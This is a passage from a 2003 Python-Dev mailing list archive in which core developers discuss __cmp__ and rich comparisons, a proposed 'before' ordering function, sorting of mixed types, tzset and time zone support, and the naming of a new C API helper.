> Guido> followed by __eq__, it would get two False results in a row,
> Guido> meaning it could return 1 (cmp() doesn't really expect
> Guido> incomparable results :-), but at the cost of comparing each
> Guido> pair of items twice.  If cmp() picked another set of two
> Guido> operators to try, I'd simply adjust the example.

[Andrew Koenig]
> Yes.  If you want to present a 3-way comparison to users, an
> underlying 3-way comparison is the fastest way to do it.  The trouble
> is that a 3-way comparison is definitely not the fastest way to
> present a 2-way comparison to users.
> 
> So if you want users to see separate 2-way and 3-way comparisons,
> I think the fastest way to implement them is not to try to force
> commonality where none exists.

This seems an argument for keeping both __cmp__ and the six __lt__
etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

I wonder, what's the need for cmp()?  My hunch is that the main reason
for cmp() is that it's specified in various APIs -- e.g. list.sort(),
or FP hardware.  But don't those APIs usually specify cmp() because
their designers (mistakenly) believed the three different outcomes
were easy to compute together and it would simplify the API?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Sun Mar 16 20:43:49 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 16 Mar 2003 15:43:49 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <002501c2ebfc$d68f59c0$125ffea9@oemcomputer>

> [Andrew Koenig]
> > Yes.  If you want to present a 3-way comparison to users, an
> > underlying 3-way comparison is the fastest way to do it.  The trouble
> > is that a 3-way comparison is definitely not the fastest way to
> > present a 2-way comparison to users.
> > 
> > So if you want users to see separate 2-way and 3-way comparisons,
> > I think the fastest way to implement them is not to try to force
> > commonality where none exists.
> 
> This seems an argument for keeping both __cmp__ and the six __lt__
> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

Recent experience with sets.py shows that __cmp__ has a high
PITA factor when combined rich comparisons.  There was no
good way to produce all of the desired behaviors:

 *  <, <=, >, >=  having subset interpretations
 *  __cmp__ being marked as not implemented
 * cmp(a,b) not by-passing __cmp__ when __lt__ and __eq__
    were defined.

The source of the complications is that comparing Set('a') and Set('b')
returns False for *all* of  <, <=, ==, >=, >.  Internally, three-way
compares relied on the falsehood of some implying the truth of
others.


Raymond Hettinger


#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From pedronis@bluewin.ch  Sun Mar 16 20:48:11 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 16 Mar 2003 21:48:11 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <028801c2ebfd$5bc6be80$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
>
> This seems an argument for keeping both __cmp__ and the six __lt__
> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.
>

one minor problem with the six __lt__ etc is that they should be all defined.
For quick things (although I know better) I still define just __cmp__ out of
laziness.

regards


From python@rcn.com  Sun Mar 16 21:59:56 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 16 Mar 2003 16:59:56 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net> <028801c2ebfd$5bc6be80$6d94fea9@newmexico>
Message-ID: <001701c2ec07$624f8520$125ffea9@oemcomputer>

> one minor problem with the six __lt__ etc is that they should be all defined.
> For quick things (although I know better) I still define just __cmp__ out of
> laziness.

Sometime back, I proposed a mixin for this.

class C(CompareMixin):
     def __eq__(self, other): ...
     def __lt__(self, other): ...

The __eq__ by itself is enough to get __ne__ defined for you.
Defining both __eq__ and __lt__ gets you all the rest.


Raymond Hettinger

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From tim.one@comcast.net  Sun Mar 16 22:09:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 17:09:29 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <028801c2ebfd$5bc6be80$6d94fea9@newmexico>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENEBAB.tim.one@comcast.net>

[Samuele Pedroni]
> one minor problem with the six __lt__ etc is that they should be
> all defined.  For quick things (although I know better) I still define
> just __cmp__ out of laziness.

Or out of sanity <wink>.  2.3's datetime type is interesting that way.  The
Python implementation of that (which lives in Zope3, and in a Python
sandbox, and which you may want to use for Jython) now has lots of trivial
variations of

    def __le__(self, other):
        if isinstance(other, date):
            return self.__cmp(other) <= 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

Before 2.3a2, it just defined __cmp__ and so avoided this code
near-duplication, but then we decided it would be better to let == and !=
return False and True (respectively, and instead of raising TypeError) when
mixing a date or time or datetime with some other type.


From tim.one@comcast.net  Sun Mar 16 22:32:15 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 17:32:15 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>

[Guido]
> ...
> I wonder, what's the need for cmp()?  My hunch is that the main reason
> for cmp() is that it's specified in various APIs -- e.g. list.sort(),
> or FP hardware.  But don't those APIs usually specify cmp() because
> their designers (mistakenly) believed the three different outcomes
> were easy to compute together and it would simplify the API?

The three possible outcomes from lexicographic comparison are natural to
compute together, though (compare elements left to right until hitting the
first non-equal element compare).  I expect C's designers had string
comparison mostly in mind, and it's natural for lots of search structures to
need know which of the three outcomes obtains.  For example, probing a
vanilla binary search tree needs to stop when it hits a node with key equal
to the thing searched for, or move left or right when != obtains.

Long int comparison is a variant of lexicographic comparison, and this
problem shows up repeatedly in a multitude of guises:  you have postive long
ints x and y, and want to find the long int q closest to x/y.

    q, r = divmod(x, y)
    # round nearest/even
    if 2*r > q or (q & 1 and 2*r == q):
        q += 1

is more expensive than necessary when the "q & 1 and 2*r == q" part holds:
the "2*r > q" part had to compare 2*r to q all the way to the end to deduce
that > wasn't the answer, and then you do it all over again to deduce that
equality is the right answer.

    q, r = divmod(x, y)
    c = cmp(2*r, q)
    if c > 0 or (q & 1 and c == 0):
        q += 1

is faster, and Python's long_compare() doesn't do any more work than is
really needed by this algorithm.

So sometimes cmp() is exactly what you want.  OTOH, if Python never had it,
the efficiency gains in such cases probably aren't common enough that a
compelling case for adding it could have been made.


From drifty@alum.berkeley.edu  Sun Mar 16 23:25:15 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sun, 16 Mar 2003 15:25:15 -0800 (PST)
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
Message-ID: <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>

[Tim Peters]

> The cross-platform semantics of TZ are a joke.  The tests we have rely on
> non-standard extensions (viewing POSIX as the only definitive std here).
> Even if they stuffed colons at the front, POSIX leaves the interpretation of
> colon-initiated TZ values entirely up to the implementation:
>
>     If TZ is of the first format (that is, if the first character is a
>     colon), the characters following the colon are handled in an
>     implementation-defined manner.
>
> Worse, if the platform tzset() isn't happy with TZ's value, it has no way to
> tell you:  the function is declared void, and has no defined effects on
> errno.
>

If this thing is so broken, why are we bothering with it?  It's one thing
to want to give people access to facilities that do something useful; it's
another thing entirely to give them access to something that is broken.

Perhaps if we are going to bother to make this available the work should
be done to make it have more standard output?  So take whatever the C
function returns and then make it conform to some reasonable output.

-Brett


From greg@cosc.canterbury.ac.nz  Sun Mar 16 23:45:40 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 11:45:40 +1200 (NZST)
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303150857.53214.aleax@aleax.it>
Message-ID: <200303162345.h2GNjeH03921@oma.cosc.canterbury.ac.nz>

Alex Martelli <aleax@aleax.it>:

> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).

As I think I've mentioned before, Python really needs
two different kinds of comparison: one which does whatever
makes sense for objects of compatible types (and which
need not be supported by all types), and another which
imposes an arbitrary order on all objects.

When sorting a list, you would have to specify which
kind of ordering you wanted.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Sun Mar 16 23:54:54 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 11:54:54 +1200 (NZST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>

Guido:

> And I'm still hoping to remove __cmp__; there should be only one
> way to overload comparisons.

I'd rather you kept it and re-defined it to mean
"compare for arbitrary ordering". (Maybe change its
name if there are backwards-compatibility issues.)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 17 00:37:20 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 12:37:20 +1200 (NZST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303170037.h2H0bKf04632@oma.cosc.canterbury.ac.nz>

Guido:

> But don't those APIs usually specify cmp() because
> their designers (mistakenly) believed the three different outcomes
> were easy to compute together and it would simplify the API?

I reckon it all goes back to Fortran with its
IF (X) 10,20,30 statement.

Maybe the first Fortran machine had a 3-way
jump instruction?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Mon Mar 17 01:43:33 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 20:43:33 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Sun, 16 Mar 2003 15:25:15 PST."
 <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
 <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>
Message-ID: <200303170143.h2H1hXH16557@pcp02138704pcs.reston01.va.comcast.net>

> If this thing is so broken, why are we bothering with it?  It's one thing
> to want to give people access to facilities that do something useful; it's
> another thing entirely to give them access to something that is broken.
> 
> Perhaps if we are going to bother to make this available the work should
> be done to make it have more standard output?  So take whatever the C
> function returns and then make it conform to some reasonable output.

I look at it differently.  It's useful to make the platform tzset()
available, because it lets us do something that couldn't be done
before: change the definition of local time without restarting Python.
If tzset() doesn't take standardized arguments, that's the problem of
whoever wants to use it.  There are lots of functions that have this:
for example, anything taking a filename.  At least it's there.

The test suite for tzset() probably is too strict; we'll tune it to
avoid failures on common platforms during the beta cycle.

I don't know if it makes sense to provide tzset() on Windows; from
Tim's description it doesn't sound likely.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 17 01:50:40 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 20:50:40 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Mon, 17 Mar 2003 11:54:54 +1200."
 <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>
References: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>
Message-ID: <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>

> Guido:
> > And I'm still hoping to remove __cmp__; there should be only one
> > way to overload comparisons.

[Greg]
> I'd rather you kept it and re-defined it to mean
> "compare for arbitrary ordering". (Maybe change its
> name if there are backwards-compatibility issues.)

Hm, that's not what it does now, and an arbitrary ordering is better
defined by a "less" style operator.

I've been thinking of __before__ and a built-in before(x, y) -> bool.
(Not __less__ / less, because IMO that's to close to __lt__ / <.)

BTW, there are two possible uses for before(): it could be used to
impose an arbitrary ordering for types that don't have one now (like
complex); and it could be used to impose an ordering between different
types (like numbers and strings).  I've got a gut feeling that the
requirements for these are somewhat different, but can't quite
pinpoint it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon Mar 17 02:17:23 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 21:17:23 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <200303170143.h2H1hXH16557@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFMEBAB.tim.one@comcast.net>

[Guido]
> ...
> I don't know if it makes sense to provide tzset() on Windows; from
> Tim's description it doesn't sound likely.

I wouldn't object if someone else wanted to do the work (which includes
documenting it well enough to cut off an endless stream of obvious
questions).  The Windows tzset is weak but maybe usable for some people.
For example, time zone names must be exactly 3 characters, and you can't
tell the Windows tzset when daylight time begins or ends:  it uses US rules
no matter what the time zone.  The native Win32 SetTimeZoneInformation()
doesn't suffer these idiocies, but I'm not sure whether calling that affects
the Unixish _tzname (etc) variables.  "Doing the work" also means figuring
out all that stuff.


From zen@shangri-la.dropbear.id.au  Mon Mar 17 03:51:42 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Mon, 17 Mar 2003 14:51:42 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
Message-ID: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>

On Sunday, March 16, 2003, at 04:07  PM, Tim Peters wrote:

> Worse, if the platform tzset() isn't happy with TZ's value, it has no 
> way to
> tell you:  the function is declared void, and has no defined effects on
> errno.

Yup. It sucks, but is the best there is. I can't even find proprietary
solutions for various Unix flavours. Maybe a post to Slashdot saying
Zope 3 will be Windows only due to limitations in POSIX would at least
get something for the free distros :-)

> I hope the community takes up the challenge of building a sane
> cross-platform time zone facility building on 2.3 datetime's tzinfo 
> objects.

A cross-platform time zone facility isn't a problem - the data we need 
is
available and maintained as part of numerous free Unix distributions. We
could even steal C code to decode it if we are particularly lazy.

The trick is that updates to coutries' timezone changes don't follow the
Python release schedule, and I think this was covered in depth on 
python-dev
not long ago in excruciating details that I'm sure no one wants to 
repeat :-)

So the actual problem would be how to distribute data file updates to 
Python
installations, which would also mean we could support the various ISO
standards relating to things like country codes and languages (which I'm
sure many of us are currently doing manually).

Possibly a script that could be run as the 
user-who-owns-the-python-installation
to update from source forge, which python-announce as the notification 
channel
when files are updated?

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From aleax@aleax.it  Mon Mar 17 07:25:48 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 17 Mar 2003 08:25:48 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>
References: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz> <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303170825.48556.aleax@aleax.it>

On Monday 17 March 2003 02:50 am, Guido van Rossum wrote:
> > Guido:
> > > And I'm still hoping to remove __cmp__; there should be only one
> > > way to overload comparisons.
>
> [Greg]
>
> > I'd rather you kept it and re-defined it to mean
> > "compare for arbitrary ordering". (Maybe change its
> > name if there are backwards-compatibility issues.)
>
> Hm, that's not what it does now, and an arbitrary ordering is better
> defined by a "less" style operator.

+1.  I entirely agree that any ordering is easier to define with a
2-way comparison with the usual constraints of ordering, i.e.,
for any x, y, 
    before(x,x) is false, 
    before(x,y) implies not before(y,x), 
    before(x,y) and before(y,z) implies before(x,z)
and for this specific purpose of arbitrary ordering, it would, I think,
be necessary for 'before' to define a total ordering, i.e. the implied
equivalence being equality, i.e.
    not before(x,y) and not before(y,x) imply x==y
(This latter desideratum may be a source of problems, see below).

It would also be very nice if before(x,y) were the same as x<y
whenever the latter doesn't raise an exception, if feasible.


> I've been thinking of __before__ and a built-in before(x, y) -> bool.
> (Not __less__ / less, because IMO that's to close to __lt__ / <.)

I love the name 'before' and I entirely concur with your decision
to avoid the name 'less'.

> BTW, there are two possible uses for before(): it could be used to
> impose an arbitrary ordering for types that don't have one now (like
> complex); and it could be used to impose an ordering between different
> types (like numbers and strings).  I've got a gut feeling that the
> requirements for these are somewhat different, but can't quite
> pinpoint it.

Perhaps subclassing/subtyping [and other possible cases where
x==y may be true yet type(x) is not type(y)] may be the sticky
issues, when all desirable constraints are considered together.  

The simplest problematic case I can think of is before(1,1+0j) --
by the "respect ==" criterion I would want both this comparison,
and the same one with operands swapped, to be false; but by
the criterion of imposing ordering between different incomparable
types, I would like 'before' to range all instances of 'complex'
"together", either all before, or all after, "normal" (comparable)
numbers (ideally in a way that while arbitrary is repeatable over
different runs/platforms/Python releases -- mostly for ease of
teaching and explaining, rather than as a specific application need).


Alex


From whisper@oz.net  Mon Mar 17 07:57:24 2003
From: whisper@oz.net (David LeBlanc)
Date: Sun, 16 Mar 2003 23:57:24 -0800
Subject: [Python-Dev] Windows IO
Message-ID: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>

It looks as though IO in Python (2.2.1), regardless of platform or device,
happens in Objects/fileobject.c and, in particular, writing occurs in
file_write(...)?

A few questions I hope a lurking (timbot? ;) ) person can answer:

1. Is the above true, or does something different happen when using a
Windows console/commandline?

2. Is there any way to know if a console is being used (that a device is the
console)?

3. What's the purpose of the PC/msvcrtmodule.c file? Does it play any role
in the regular pythonic IO scheme of things?

I'm interested in discovering if the Win32 API for screen reading/writing
can be used so that character color attributes and cursor commands can be
manipulated. It would be nice if those could be used transparently to a
python application so that an application sending (for instance) ANSI color
codes would succede and one that didn't wouldn't care. I realize this is
sort of like curses - is there a Windows version of curses that plays well
with Python and isn't GPL?

TIA,

David LeBlanc
Seattle, WA USA


From thomas@xs4all.net  Mon Mar 17 10:57:56 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 11:57:56 +0100
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Modules _hotshot.c,1.32,1.33 arraymodule.c,2.84,2.85 xreadlinesmodule.c,1.13,1.14
In-Reply-To: <E18uq66-0001H4-00@sc8-pr-cvs1.sourceforge.net>
References: <E18uq66-0001H4-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <20030317105756.GP2112@xs4all.nl>

On Mon, Mar 17, 2003 at 12:35:54AM -0800, rhettinger@users.sourceforge.net wrote:

> Created PyObject_GenericGetIter().
> Factors out the common case of returning self.

PyObject_GenericGetIter doesn't really describe what it does; I would assume
that tried to get the iter by assuming obj was a sequency type, and
returning an iter that wraps that. Wouldn't "PyObject_GetSelfIter" or
"PyObject_GenericSelfIter" or "PyObject_SelfIter" be a better name ?

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mwh@python.net  Mon Mar 17 11:19:38 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 17 Mar 2003 11:19:38 +0000
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <20030316073303.31B3E5147@bespin.org> (Armin Rigo's message of
 "Sat, 15 Mar 2003 23:33:03 -0800 (PST)")
References: <3E7204EC.60506@tismer.com> <3E7219D1.6090306@tismer.com>
 <20030316073303.31B3E5147@bespin.org>
Message-ID: <2mhea29r5h.fsf@starship.python.net>

Armin Rigo <arigo@tunes.org> writes:


> Maybe an API to manipulate tstate->frame could be useful and really
> lightweight.  Alternatively, we could consider what pyexpat does as
> a general pattern and have an API for it, e.g.:

Yes please!

Cheers,
M.

-- 
  Our lecture theatre has just crashed. It will currently only
  silently display an unexplained line-drawing of a large dog
  accompanied by spookily flickering lights.
     -- Dan Sheppard, ucam.chat (from Owen Dunn's summary of the year)


From mwh@python.net  Mon Mar 17 11:33:30 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 17 Mar 2003 11:33:30 +0000
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E734DD7.3080105@tismer.com> (Christian Tismer's message of
 "Sat, 15 Mar 2003 16:59:19 +0100")
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
Message-ID: <2mel569qid.fsf@starship.python.net>

Christian Tismer <tismer@tismer.com> writes:

>  >>> a=[1, 2, 2+2j, 3+1j, 1+3j, 3-3j, 3+1j, 1+3j]
>  >>> a.sort(lambda x, y:cmp(abs(x), abs(y)))
>  >>> a
> [1, 2, (2+2j), (3+1j), (1+3j), (3+1j), (1+3j), (3-3j)]
>  >>>

Ooh, now I get to mention the list.sort feature request I came up with
this weekend <wink>:

I'd like to be able to write the above call as:

>>> a.sort(key=abs)

Cheers,
M.

-- 
112. Computer Science is embarrassed by the computer.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From mal@lemburg.com  Mon Mar 17 11:34:00 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 17 Mar 2003 12:34:00 +0100
Subject: [Python-Dev] tzset
In-Reply-To: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <3E75B2A8.3030102@lemburg.com>

Stuart Bishop wrote:
> On Sunday, March 16, 2003, at 04:07  PM, Tim Peters wrote:
> 
>> Worse, if the platform tzset() isn't happy with TZ's value, it has no 
>> way to tell you:  the function is declared void, and has no defined effects on
>> errno.
> 
> Yup. It sucks, but is the best there is. I can't even find proprietary
> solutions for various Unix flavours. Maybe a post to Slashdot saying
> Zope 3 will be Windows only due to limitations in POSIX would at least
> get something for the free distros :-)

I wonder why we need a TZ-parser then ? If it's non-standard
anyway, the module is probably better off outside the core as
separate download from e.g. SF.

>> I hope the community takes up the challenge of building a sane
>> cross-platform time zone facility building on 2.3 datetime's tzinfo 
>> objects.
> 
> A cross-platform time zone facility isn't a problem - the data we need is
> available and maintained as part of numerous free Unix distributions. We
> could even steal C code to decode it if we are particularly lazy.

-1

Why bloat the Python distribution with yet another locale
implementation ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 17 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     15 days left
EuroPython 2003, Charleroi, Belgium:                        99 days left


From guido@python.org  Mon Mar 17 12:26:24 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 07:26:24 -0500
Subject: [Python-Dev] Who approved PyObject_GenericGetIter()???
In-Reply-To: "Your message of Mon, 17 Mar 2003 00:22:59 PST."
 <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>

> Modified Files:
> 	object.c 
> Log Message:
> Created PyObject_GenericGetIter().
> Factors out the common case of returning self.
> 
> 
> 
> Index: object.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
> retrieving revision 2.199
> retrieving revision 2.200
> diff -C2 -d -r2.199 -r2.200
> *** object.c	19 Feb 2003 03:19:29 -0000	2.199
> --- object.c	17 Mar 2003 08:22:56 -0000	2.200
> ***************
> *** 1302,1305 ****
> --- 1302,1312 ----
>   
>   PyObject *
> + PyObject_GenericGetIter(PyObject *obj)
> + {
> + 	Py_INCREF(obj);
> + 	return obj;
> + }
> + 
> + PyObject *
>   PyObject_GenericGetAttr(PyObject *obj, PyObject *name)
>   {

Huh?  Where was this agreed upon?  __iter__ returning self doesn't
sound very generic to me, so at the very least the name should be
changed IMO.  Also, adding a standard API for a helper function this
trivial doesn't really make sense to me.

So maybe I'm missing something.  Please explain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 17 12:35:23 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 07:35:23 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Mon, 17 Mar 2003 12:34:00 +0100."
 <3E75B2A8.3030102@lemburg.com>
References: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
 <3E75B2A8.3030102@lemburg.com>
Message-ID: <200303171235.h2HCZNC17807@pcp02138704pcs.reston01.va.comcast.net>

> > A cross-platform time zone facility isn't a problem - the data we need is
> > available and maintained as part of numerous free Unix distributions. We
> > could even steal C code to decode it if we are particularly lazy.
> 
> -1
> 
> Why bloat the Python distribution with yet another locale
> implementation ?

Agreed.  This should be a 3rd party add-on.  (Especially since in many
cases, tzset() does all you need.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mchermside@ingdirect.com  Mon Mar 17 13:50:22 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Mon, 17 Mar 2003 08:50:22 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F04211EF@INGDEXCHSANC1.ingdirect.com>

[Christian Tismer]
> that people are putting widely different types into
> a list in order to sort them. (Although there is an
> arbitrary order between strings and numbers, which
> I would drop in Python 2.4, too).

[Alex Martelli]
> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.  So, for example, all places which get
> and sort the list of keys in a dictionary in order to return=20
> or display the keys should presumably do the sorting
> within a try/except?
        [...]
> Or do you think a dictionary should also be constrained to have keys
> that are all comparable with each other (i.e., presumably, never
> both string AND number keys) as well as hashable?

[Guido van Rossum]
> I don't believe this argument.  I've indeed often sorted a dict's keys
> (or values), but always in situations where the sorted values were
> homogeneous as far meaningful comparison goes, e.g. all numbers, or
> all strings, or all "compatible" tuples.
>=20
> If you know *nothing* about the keys of a dict, you already have to do
> that if you want to sort the keys.
>=20
> There are lots of apps that have no need to ever sort the keys: if
> there weren't, it would have been wiser to keep the keys in sorted
> order in the first place, like ABC did.

Actually, I found Alex's example to be quite persuasive. I had
been reading this thread and thinking how I essentially never
create and sort lists containing mixed arbitrary objects. But I
DO use dicts, and while most of my dicts have string-only keys,
there are others that don't.

I wouldn't want to maintain the keys in sorted order, because I
don't have to sort my dictionaries (at least the ones that have
mixed arbitrary objects for keys), *EXCEPT* that I *DO* sort them
when I'm debugging! It's a pain (as I'm sure you know) to examine
two dicts in a logfile or debug session and find how they differ,
a task made much easier by sorting the keys before listing.

So Alex convinced me that I *DO* have a use-case for sorting
arbitrary things after all... in code (like my dict prettifier)
used for coding and debugging. And if I ever used complex numbers
in my lists, I'd already be in trouble... but somehow it's never
come up. (I guess complex #s as keys are unusual ;-).)

I think the lesson is that we shouldn't break arbitrary object
comparison (more than it's already broken) until AFTER Guido's
OTHER proposal (the "before()" comparison) is in place to be used
in this sort of situation. I wouldn't mind switching over to a
slightly different syntax as long as I don't have to write a
custom sort routine each and every time I want to print a dict
to the logs.

[Guido van Rossum]
> I'm sure that raising an exception on abominations like 2 < "1" or
